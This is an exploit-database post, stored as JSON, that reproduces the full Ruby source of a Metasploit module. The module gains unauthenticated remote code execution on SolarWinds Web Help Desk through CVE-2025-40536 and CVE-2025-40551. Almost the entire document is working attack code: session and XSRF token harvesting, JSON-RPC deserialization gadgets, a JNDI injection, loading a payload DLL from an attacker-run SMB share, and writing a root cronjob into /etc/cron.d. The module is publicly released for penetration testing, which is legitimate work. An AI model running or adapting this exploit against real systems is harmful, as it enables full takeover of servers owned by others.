{"id":40805,"date":"2026-02-13T13:39:09","date_gmt":"2026-02-13T13:39:09","guid":{"rendered":"http:\/\/localhost\/?p=40805"},"modified":"2026-02-13T13:39:09","modified_gmt":"2026-02-13T13:39:09","slug":"solarwinds-web-help-desk-unauthenticated-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40805","title":{"rendered":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T19:28:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an access control bypass vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk WHD server. Module Options msf use&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-13T18:59:17&#8243;,&#8221;modified&#8221;:&#8221;2026-02-13T18:59:17&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;SolarWinds Web Help Desk unauthenticated RCE&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-40536&#8243;,&#8221;CVE-2025-40551&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = GreatRanking\\n\\n  include Msf::Exploit::Remote::JndiInjection\\n  include Msf::Exploit::Remote::HttpClient\\n  prepend Msf::Exploit::Remote::AutoCheck\\n  include Msf::Exploit::EXE\\n  include Msf::Exploit::Retry\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;SolarWinds Web Help Desk unauthenticated RCE&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization\\n          vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD)\\n          server.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Jimi Sebree&#8217;, # Original finder @ horizon3.ai\\n          &#8216;sfewer-r7&#8217; # MSF module (Based on the Nuclei template by horizon3.ai)\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          # Access control bypass vulnerability\\n          [&#8216;CVE&#8217;, &#8216;2025-40536&#8217;],\\n          # Unsafe deserialization for RCE\\n          [&#8216;CVE&#8217;, &#8216;2025-40551&#8217;],\\n          # Vendor advisory\\n          [&#8216;URL&#8217;, &#8216;https:\/\/documentation.solarwinds.com\/en\/success_center\/whd\/content\/release_notes\/whd_2026-1_release_notes.htm&#8217;],\\n          # Technical analysis from horizon3.ai\\n          [&#8216;URL&#8217;, &#8216;https:\/\/horizon3.ai\/attack-research\/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue\/&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-01-28&#8217;,\\n        &#8216;Privileged&#8217; =\\u003e true, # Runs as \\&#8221;NT AUTHORITY\\\\SYSTEM\\&#8221; by default on a Windows install.\\n        &#8216;Platform&#8217; =\\u003e [&#8216;win&#8217;, &#8216;unix&#8217;, &#8216;linux&#8217;],\\n        &#8216;Arch&#8217; =\\u003e [ARCH_X64, ARCH_CMD],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;WHD 12.8.* on Windows (Native code payload)&#8217;, {\\n              &#8216;VersionStart&#8217; =\\u003e &#8216;12.8&#8217;,\\n              &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_X64 # Ships as a Java application running in a x64 java.exe process\\n            }\\n          ],\\n          [\\n            &#8216;WHD 12.8.* on Linux (Command payload)&#8217;, {\\n              &#8216;VersionStart&#8217; =\\u003e &#8216;12.8&#8217;,\\n              &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              &#8216;Payload&#8217; =\\u003e {\\n                &#8216;BadChars&#8217; =\\u003e &#8216;\\\\&#8221;\\n              },\\n              &#8216;WfsDelay&#8217; =\\u003e 90 # cron can take ~1 minute\\n            }\\n          ],\\n          [\\n            &#8216;WHD 12.7.* on Windows (Command payload)&#8217;, {\\n              &#8216;VersionStart&#8217; =\\u003e &#8216;12.7&#8217;,\\n              &#8216;GadgetChain&#8217; =\\u003e &#8216;CommonsBeanutils1&#8217;,\\n              &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n            }\\n          ],\\n          [\\n            &#8216;WHD 12.7.* on Linux (Command payload)&#8217;, {\\n              &#8216;VersionStart&#8217; =\\u003e &#8216;12.7&#8217;,\\n              &#8216;GadgetChain&#8217; =\\u003e &#8216;CommonsBeanutils1&#8217;, # Tested against Web Help Desk version 12.7.11.1182 (linux)\\n              &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n            }\\n          ],\\n        ],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;DefaultOptions&#8217; =\\u003e {\\n          &#8216;RPORT&#8217; =\\u003e 8443,\\n          &#8216;SSL&#8217; =\\u003e true\\n        },\\n        &#8216;Notes&#8217; =\\u003e {\\n          # For the 12.8.* target on Windows, the service may crash and restart so we use a stability of\\n          # CRASH_SERVICE_RESTARTS, but for all the other targets the stability is CRASH_SAFE.\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SERVICE_RESTARTS],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS] # C:\\\\Program Files\\\\WebHelpDesk\\\\log\\\\whd.log\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;])\\n    ])\\n  end\\n\\n  def check\\n    session_ctx = step1_initial_session\\n\\n    CheckCode::Vulnerable(\\&#8221;Detected Web Help Desk version #{session_ctx[:version]} (#{session_ctx[:platform]}).\\&#8221;)\\n  rescue Msf::Exploit::Failed =\\u003e e\\n    CheckCode::Unknown(e.to_s)\\n  end\\n\\n  def exploit\\n    print_status(&#8216;Step 1 &#8211; Initial session&#8230;&#8217;)\\n\\n    session_ctx = step1_initial_session\\n\\n    # Verify the remote target matches the expectations for the Metasploit target&#8217;s version and platform&#8230;\\n\\n    fail_with(Failure::BadConfig, \\&#8221;Remote target is running version #{session_ctx[:version]}, current Metasploit target gadget chain is for version #{target[&#8216;VersionStart&#8217;]}.*. Set a different target.\\&#8221;) unless session_ctx[:version].start_with? target[&#8216;VersionStart&#8217;]\\n\\n    case target[&#8216;Platform&#8217;]\\n    when &#8216;win&#8217;\\n      fail_with(Failure::BadConfig, \\&#8221;Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target[&#8216;Platform&#8217;]}. Set a different target.\\&#8221;) unless session_ctx[:platform] == :windows\\n    when [&#8216;unix&#8217;, &#8216;linux&#8217;]\\n      fail_with(Failure::BadConfig, \\&#8221;Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target[&#8216;Platform&#8217;]}. Set a different target.\\&#8221;) unless session_ctx[:platform] == :linux\\n    else\\n      fail_with(Failure::BadConfig, \\&#8221;Unexpected target platform #{target[&#8216;Platform&#8217;]}. Set a different target.\\&#8221;)\\n    end\\n\\n    session_ctx[:service] = get_target_service(session_ctx)\\n\\n    print_status(&#8216;Step 2 &#8211; Login pref page&#8230;&#8217;)\\n\\n    external_auth_container = step2_login_pref_page(session_ctx)\\n\\n    print_status(&#8216;Step 3 &#8211; Trigger SAML object&#8230;&#8217;)\\n\\n    step3_trigger_saml_object(session_ctx, external_auth_container)\\n\\n    print_status(&#8216;Step 4 &#8211; Create JSON RPC bridge&#8230;&#8217;)\\n\\n    jsonrpc_client = step4_create_jsonrpc_bridge(session_ctx)\\n\\n    print_status(&#8216;Step 5 &#8211; Unsafe deserialization&#8230;&#8217;)\\n\\n    get_target_gadgets(session_ctx).each do |gadget|\\n      print_status(\\&#8221;  Executing gadget &#8211; #{gadget[:title]}\\&#8221;)\\n\\n      step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, gadget[:json_data], return_early: true)\\n\\n      Rex::ThreadSafe.sleep(2)\\n    end\\n\\n    # block untill we get a session, so we dont tear down the SMB\/LDAP service prematurly.\\n    retry_until_truthy(timeout: datastore[&#8216;WfsDelay&#8217;]) do\\n      !handler_enabled? || session_created?\\n    end\\n\\n    unless session_ctx[:service].nil?\\n      session_ctx[:service].cleanup\\n    end\\n\\n    handler\\n  ensure\\n    cleanup_service\\n  end\\n\\n  class SimpleSMBShareWrapper \\u003c ::Msf::Exploit\\n    include ::Msf::Exploit::Remote::SMB::Server::Share\\n  end\\n\\n  def get_target_service(session_ctx)\\n    if target[&#8216;VersionStart&#8217;] == &#8216;12.7&#8217;\\n      start_service\\n      return nil\\n    end\\n\\n    # For 12.8.* targets on Windows, our gadget will force a native code library (a DLL) to be loaded from a UNC path\\n    # over SMB. We need to spin up an SMB server with a share to satisfy this. As we already\\n    # include Msf::Exploit::Remote::JndiInjection we cannot also include Msf::Exploit::Remote::SMB::Server::Share. To\\n    # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.\\n    return nil unless target[&#8216;VersionStart&#8217;] == &#8216;12.8&#8217; \\u0026\\u0026 session_ctx[:platform] == :windows\\n\\n    if Rex::Socket.is_ip_addr?(datastore[&#8216;SRVHOST&#8217;]) \\u0026\\u0026 Rex::Socket.addr_atoi(datastore[&#8216;SRVHOST&#8217;]) == 0\\n      fail_with(Exploit::Failure::BadConfig, &#8216;The SRVHOST option must be set to a routable IP address.&#8217;)\\n    end\\n\\n    # NOTE: It has to be TCP port 445 for SMB, so we don&#8217;t expose this port number to the user as an option.\\n    print_status(\\&#8221;Serving a malicious extension over an SMB share on #{datastore[&#8216;SRVHOST&#8217;]} (SMB on TCP port 445)\\&#8221;)\\n\\n    smb_service = SimpleSMBShareWrapper.new\\n\\n    smb_service.datastore[&#8216;SRVPORT&#8217;] = 445\\n    smb_service.datastore[&#8216;SRVHOST&#8217;] = datastore[&#8216;SRVHOST&#8217;]\\n\\n    smb_service.setup\\n\\n    smb_service.file_contents = generate_payload_dll\\n\\n    smb_service.file_name += &#8216;.dll&#8217;\\n\\n    smb_service.start_service({\\n      &#8216;ServerPort&#8217; =\\u003e 445,\\n      &#8216;ServerHost&#8217; =\\u003e datastore[&#8216;SRVHOST&#8217;]\\n    })\\n\\n    smb_service\\n  end\\n\\n  def get_target_gadgets(session_ctx)\\n    gadgets = []\\n\\n    if target[&#8216;VersionStart&#8217;] == &#8216;12.7&#8217;\\n      # Tested against Web Help Desk version 12.7.11.1182 running on Linux.\\n\\n      print_status(\\&#8221;Malicious JNDI URL: #{jndi_string}\\&#8221;)\\n\\n      gadgets.push({\\n        title: &#8216;Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource&#8217;,\\n        json_data: {\\n          &#8216;javaClass&#8217; =\\u003e &#8216;ch.qos.logback.core.db.JNDIConnectionSource&#8217;, # logback-core.jar\\n          &#8216;jndiLocation&#8217; =\\u003e jndi_string\\n        }\\n      })\\n    elsif target[&#8216;VersionStart&#8217;] == &#8216;12.8&#8217;\\n      # We first need to register the org.sqlite.JDBC driver so we can use it, as it may have not already\\n      # been registered. By instantiating org.sqlite.JDBC, the classes static initializer will register the driver.\\n      gadgets.push({\\n        title: &#8216;Registering the org.sqlite.JDBC driver&#8217;,\\n        json_data: {\\n          &#8216;javaClass&#8217; =\\u003e &#8216;org.sqlite.JDBC&#8217;\\n        }\\n      })\\n\\n      if session_ctx[:platform] == :windows\\n        print_status(\\&#8221;Malicious SQLite extension UNC: #{session_ctx[:service].unc}\\&#8221;)\\n\\n        # With the org.sqlite.JDBC driver available, we leverage com.zaxxer.hikari.HikariDataSource to create a sqlite\\n        # connection. We use a sqlite in-memory database to avoid touching disk, and we leverage the enable_load_extension\\n        # pragma to allow us to load arbitrary native code extensions. Hikari allows us to execute arbitrary SQL statement\\n        # when a new database connection is opened. We use this to load a malicious extension that contains a Metasploit\\n        # native code payload.\\n        #\\n        # Tested against Web Help Desk version 12.8.8.2528 running on Windows Server 2022 (NOTE: If you are using\\n        # the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your\\n        # own payloads).\\n        gadgets.push({\\n          title: &#8216;Loading malicious extension over SMB&#8217;,\\n          json_data: {\\n            &#8216;javaClass&#8217; =\\u003e &#8216;com.zaxxer.hikari.HikariDataSource&#8217;,\\n            &#8216;driverClassName&#8217; =\\u003e &#8216;org.sqlite.SQLiteDataSource&#8217;,\\n            &#8216;jdbcUrl&#8217; =\\u003e &#8216;jdbc:sqlite::memory:?enable_load_extension=true&#8217;,\\n            &#8216;connectionInitSql&#8217; =\\u003e \\&#8221;SELECT load_extension(&#8216;#{session_ctx[:service].unc}&#8217;);\\&#8221;\\n          }\\n        })\\n      elsif session_ctx[:platform] == :linux\\n        # Leveraging a dirty file write viw SQLite to a cronjob has been shown to work against some cron daemons:\\n        # https:\/\/kiddo-pwn.github.io\/blog\/2025-11-30\/writing-sync-popping-cron\\n        # However when testing against an Ubuntu system, I get the syslog error:\\n        # cron[427]: Error: bad minute; while reading \/etc\/cron.d\/hax_5\\n        #\\n        random_name = Rex::Text.rand_text_alpha(8)\\n\\n        gadgets.push({\\n          title: \\&#8221;Creating file in \/etc\/cron.d\/#{random_name}\\&#8221;,\\n          json_data: {\\n            &#8216;javaClass&#8217; =\\u003e &#8216;com.zaxxer.hikari.HikariDataSource&#8217;,\\n            &#8216;driverClassName&#8217; =\\u003e &#8216;org.sqlite.SQLiteDataSource&#8217;,\\n            &#8216;jdbcUrl&#8217; =\\u003e \\&#8221;jdbc:sqlite:\/etc\/cron.d\/#{random_name}\\&#8221;,\\n            &#8216;connectionInitSql&#8217; =\\u003e &#8216;CREATE TABLE a (b TEXT UNIQUE);&#8217;\\n          }\\n        })\\n\\n        gadgets.push({\\n          title: \\&#8221;Dirty file write to \/etc\/cron.d\/#{random_name}\\&#8221;,\\n          json_data: {\\n            &#8216;javaClass&#8217; =\\u003e &#8216;com.zaxxer.hikari.HikariDataSource&#8217;,\\n            &#8216;driverClassName&#8217; =\\u003e &#8216;org.sqlite.SQLiteDataSource&#8217;,\\n            &#8216;jdbcUrl&#8217; =\\u003e \\&#8221;jdbc:sqlite:\/etc\/cron.d\/#{random_name}\\&#8221;,\\n            &#8216;connectionInitSql&#8217; =\\u003e \\&#8221;INSERT OR IGNORE INTO a (b) VALUES (&#8216;\\\\n* * * * * root #{payload.encoded}\\\\n&#8217;);\\&#8221;\\n          }\\n        })\\n      end\\n    else\\n      fail_with(Failure::BadConfig, \\&#8221;Unexpected target version #{target[&#8216;VersionStart&#8217;]}. Set a different target.\\&#8221;)\\n    end\\n  end\\n\\n  # By default, Metasploit will use BeanFactory, but we want CommonsBeanutils1. The gadget chain used here is left\\n  # as a target option so we can add new targets (i.e. specific versions of WHD) with ease.\\n  def build_ldap_search_response_payload\\n    build_ldap_search_response_payload_inline(target[&#8216;GadgetChain&#8217;])\\n  end\\n\\n  def step1_initial_session\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;helpdesk&#8217;, &#8216;WebObjects&#8217;, &#8216;Helpdesk.woa&#8217;),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;x-webobjects-recording&#8217; =\\u003e &#8216;1&#8217;\\n      }\\n    )\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Connection failed&#8217;) unless res\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Step 1 &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n\\n    m = res.body.match(%r{\\&#8221;\/helpdesk\/\\\\w+\/\\\\w+\\\\.css\\\\?v=([\\\\d_]+)\\&#8221;})\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Failed to extract version&#8217;) unless m\\n\\n    version = m[1].gsub(&#8216;_&#8217;, &#8216;.&#8217;)\\n\\n    vprint_status(\\&#8221;Version: #{version}\\&#8221;)\\n\\n    m = res.body.match(%r{src=\\&#8221;\/helpdesk\/WebObjects\/Helpdesk\\\\.woa\/wr\\\\?wodata=(jar[^\\&#8221;]+)\\&#8221;})\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Failed to extract resource path&#8217;) unless m\\n\\n    resource_path = Rex::Text.uri_decode(m[1])\\n\\n    # jar:file:\/\/\/\/C:\/Program%20Files\/WebHelpDesk\/bin\/webapps\/helpdesk\/WEB-INF\/lib\/Ajax.jar!\/WebServerResources\/prototype.js\\n    # jar:file:\/\/\/usr\/local\/webhelpdesk\/bin\/webapps\/helpdesk\/WEB-INF\/lib\/Ajax.jar!\/WebServerResources\/prototype.js\\n    platform = if resource_path =~ %r{file:\/\/\/\/.:\/}\\n                 :windows\\n               else\\n                 resource_path =~ %r{file:\/\/\/Applications\/} ? :mac : :linux\\n               end\\n\\n    vprint_status(\\&#8221;Platform: #{platform}\\&#8221;)\\n\\n    cookies = res.get_cookies\\n\\n    jsessionid = cookies.scan(\/JSESSIONID=([A-Za-z0-9]+);*\/).flatten[0] || nil\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Failed to get JSESSIONID&#8217;) unless jsessionid\\n\\n    vprint_status(\\&#8221;JSESSIONID: #{jsessionid}\\&#8221;)\\n\\n    xsrf_token = cookies.scan(\/XSRF-TOKEN=([A-Za-z0-9-]+);*\/).flatten[0] || nil\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Failed to get XSRF-TOKEN&#8217;) unless xsrf_token\\n\\n    vprint_status(\\&#8221;XSRF-TOKEN: #{xsrf_token}\\&#8221;)\\n\\n    x_webobjects_session_id = res.headers[&#8216;x-webobjects-session-id&#8217;]\\u0026.to_s\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 1 &#8211; Failed to get x-webobjects-session-id&#8217;) unless x_webobjects_session_id\\n\\n    vprint_status(\\&#8221;x-webobjects-session-id: #{x_webobjects_session_id}\\&#8221;)\\n\\n    {\\n      version: version,\\n      platform: platform,\\n      jsessionid: jsessionid,\\n      xsrf_token: xsrf_token,\\n      x_webobjects_session_id: x_webobjects_session_id\\n    }\\n  end\\n\\n  def step2_login_pref_page(session_ctx)\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e session_ctx[:version].start_with?(&#8216;12.8&#8217;) ? &#8216;GET&#8217; : &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;helpdesk&#8217;, &#8216;WebObjects&#8217;, &#8216;Helpdesk.woa&#8217;, &#8216;wo&#8217;, \\&#8221;#{Rex::Text.rand_text_alpha(8)}.wo\\&#8221;, session_ctx[:x_webobjects_session_id], &#8216;1.0&#8217;),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;X-Xsrf-Token&#8217; =\\u003e session_ctx[:xsrf_token],\\n        &#8216;Cookie&#8217; =\\u003e \\&#8221;JSESSIONID=#{session_ctx[:jsessionid]}\\&#8221;\\n      },\\n      &#8216;vars_get&#8217; =\\u003e {\\n        Rex::Text.rand_text_alpha(8) =\\u003e &#8216;\/ajax\/&#8217;,\\n        &#8216;wopage&#8217; =\\u003e &#8216;LoginPref&#8217;\\n      }\\n    )\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 2 &#8211; Connection failed&#8217;) unless res\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Step 2 &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n\\n    m = res.body.match(%r{id=\\&#8221;externalAuthContainer\\&#8221; updateUrl=\\&#8221;\/(helpdesk\/WebObjects\/Helpdesk\\\\.woa\/ajax\/\\\\d+\\\\.\\\\d+)})\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 2 &#8211; Failed to extract externalAuthContainer&#8217;) unless m\\n\\n    external_auth_container = m[1]\\n\\n    vprint_status(\\&#8221;externalAuthContainer: #{external_auth_container}\\&#8221;)\\n\\n    external_auth_container\\n  end\\n\\n  def step3_trigger_saml_object(session_ctx, external_auth_container)\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, external_auth_container),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;X-Xsrf-Token&#8217; =\\u003e session_ctx[:xsrf_token],\\n        &#8216;Cookie&#8217; =\\u003e \\&#8221;JSESSIONID=#{session_ctx[:jsessionid]}\\&#8221;\\n      },\\n      &#8216;data&#8217; =\\u003e \\&#8221;0.7.1.3.1.0.0.0.1.1.0=1\\u0026_csrf=#{session_ctx[:xsrf_token]}\\&#8221;\\n    )\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 3 &#8211; Connection failed&#8217;) unless res\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Step 3 &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n  end\\n\\n  def step4_create_jsonrpc_bridge(session_ctx)\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e session_ctx[:version].start_with?(&#8216;12.8&#8217;) ? &#8216;GET&#8217; : &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;helpdesk&#8217;, &#8216;WebObjects&#8217;, &#8216;Helpdesk.woa&#8217;, &#8216;wo&#8217;, \\&#8221;#{Rex::Text.rand_text_alpha(8)}.wo\\&#8221;, session_ctx[:x_webobjects_session_id], &#8216;1.0&#8217;),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;X-Xsrf-Token&#8217; =\\u003e session_ctx[:xsrf_token],\\n        &#8216;Cookie&#8217; =\\u003e \\&#8221;JSESSIONID=#{session_ctx[:jsessionid]}\\&#8221;\\n      },\\n      &#8216;vars_get&#8217; =\\u003e {\\n        Rex::Text.rand_text_alpha(8) =\\u003e &#8216;\/ajax\/&#8217;,\\n        &#8216;wopage&#8217; =\\u003e &#8216;LoginPref&#8217;\\n      }\\n    )\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 4 &#8211; Connection failed&#8217;) unless res\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Step 4 &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n\\n    m = res.body.match(%r{JSONRpcClient\\\\(&#8216;\/helpdesk\/WebObjects\/Helpdesk\\\\.woa\/ajax\/([\\\\d.]+)&#8217;\\\\);})\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 4 &#8211; Failed to extract JSONRpcClient&#8217;) unless m\\n\\n    jsonrpc_client = m[1]\\n\\n    vprint_status(\\&#8221;JSONRpcClient: #{jsonrpc_client}\\&#8221;)\\n\\n    jsonrpc_client\\n  end\\n\\n  def step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data, return_early: false)\\n    random_id = rand(1..0xffff)\\n    random_name = Rex::Text.rand_text_alpha(8)\\n\\n    # whd-core.jar!com.macsdesign.util.MDSApplication.isWhitelisted\\n    allowlist = [\\n      &#8216;parentpopup&#8217;, &#8216;wonoselectionstring&#8217;, &#8216;dummy&#8217;, &#8216;mdssubmitlink&#8217;, &#8216;mdsform__enterkeypressed&#8217;,\\n      &#8216;mdsform__shiftkeypressed&#8217;, &#8216;mdsform__altkeypressed&#8217;, &#8216;_csrf&#8217;\\n    ]\\n\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;helpdesk&#8217;, &#8216;WebObjects&#8217;, &#8216;Helpdesk.woa&#8217;, &#8216;wo&#8217;, jsonrpc_client),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;X-Xsrf-Token&#8217; =\\u003e session_ctx[:xsrf_token],\\n        &#8216;Cookie&#8217; =\\u003e \\&#8221;JSESSIONID=#{session_ctx[:jsessionid]}\\&#8221;\\n      },\\n      &#8216;data&#8217; =\\u003e {\\n        Rex::Text.rand_text_alpha(8) =\\u003e \\&#8221;java.#{allowlist.shuffle.join}\\&#8221;,\\n        &#8216;id&#8217; =\\u003e random_id,\\n        &#8216;method&#8217; =\\u003e &#8216;wopage.setVariableValueForName&#8217;,\\n        &#8216;params&#8217; =\\u003e [\\n          random_name,\\n          json_data\\n        ]\\n      }.to_json\\n    )\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;Step 5A &#8211; Connection failed&#8217;) unless res\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Step 5A &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;helpdesk&#8217;, &#8216;WebObjects&#8217;, &#8216;Helpdesk.woa&#8217;, &#8216;wo&#8217;, jsonrpc_client),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;X-Xsrf-Token&#8217; =\\u003e session_ctx[:xsrf_token],\\n        &#8216;Cookie&#8217; =\\u003e \\&#8221;JSESSIONID=#{session_ctx[:jsessionid]}\\&#8221;\\n      },\\n      &#8216;data&#8217; =\\u003e {\\n        Rex::Text.rand_text_alpha(8) =\\u003e \\&#8221;java.#{allowlist.shuffle.join}\\&#8221;,\\n        &#8216;id&#8217; =\\u003e random_id,\\n        &#8216;method&#8217; =\\u003e &#8216;wopage.variableValueForName&#8217;,\\n        &#8216;params&#8217; =\\u003e [random_name]\\n      }.to_json\\n    )\\n\\n    unless return_early\\n      fail_with(Failure::UnexpectedReply, &#8216;Step 5B &#8211; Connection failed&#8217;) unless res\\n\\n      fail_with(Failure::UnexpectedReply, \\&#8221;Step 5B &#8211; Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n    end\\n  end\\n\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/solarwinds_webhelpdesk_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/solarwinds_webhelpdesk_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T19:28:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an access control bypass 